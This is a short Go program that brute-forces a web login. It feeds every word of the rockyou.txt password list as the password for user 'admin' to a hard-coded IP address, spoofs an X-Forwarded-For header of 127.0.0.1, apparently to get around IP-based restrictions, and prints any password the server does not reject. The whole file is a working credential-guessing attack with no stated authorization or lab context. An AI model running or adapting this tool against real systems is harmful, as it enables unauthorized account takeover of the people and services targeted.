package main

import (
    "bufio"
    "fmt"
    "io"
    "net/http"
    "os"
    "strings"
)

var client = &http.Client{}

func main() {
    content, err := os.Open("/usr/share/wordlists/rockyou.txt")
    if err != nil {
        fmt.Println(err)
    }
    defer content.Close()

    scanner := bufio.NewScanner(content)
    scanner.Split(bufio.ScanWords)

    for scanner.Scan() {
        url := "http://92.251.114.20/"
        //pass := fmt.Sprintf(scanner.Text())
        body := fmt.Sprintf("user=admin&pass=%s", scanner.Text())
        req, err := http.NewRequest("POST", url, strings.NewReader(body))
        if err != nil {
            fmt.Println(err)
        }
        req.Header.Add("Host", "92.251.114.20")
        req.Header.Add("X-Forwarded-For", "127.0.0.1")
        res, err := client.Do(req)
        if err != nil {
            fmt.Println(err)
        }
        bodys, _ := io.ReadAll(res.Body)
        if !strings.Contains(string(bodys), "Wrong Credential") {
            fmt.Printf("TROVATA: %s\n", body)
        }
        res.Body.Close()
    }
}
